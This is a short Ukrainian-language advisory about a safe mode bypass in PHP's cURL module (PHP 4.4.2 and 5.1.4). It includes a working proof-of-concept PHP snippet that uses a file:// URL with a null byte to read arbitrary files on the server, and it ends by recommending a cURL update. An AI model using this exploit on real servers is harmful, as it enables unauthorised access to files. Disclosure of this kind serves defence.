В PHP можливий обхід обмежень безпеки. Уразливі версії PHP: 4.4.2, 5.1.4.
Численні уразливості в модулі cURL для php дозволяють локальному користувачу обходити директиви safe mode за допомогою спеціально сгенерованих аргументів функції.
Уразливості мають локальний тип. Тобто їх можна використати або через дирявий скрипт, в якому є визови функцій cURL, або якщо є змога закачати “підготовлений” скрипт (або через уразливість на сайті, або через аплоадер, або на свій власний сайт).
Приклад коду:
<?
$ch = curl_init("file://[файл, до якого ви хочете отримати доступ]\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
Уразливість працює (вищенаведений код дозволяє отримати доступ к потрібним файлам) і представляє собою небезпеку для сайтів з наявним cURL.
Для вирішення проблеми необхідно оновити cURL.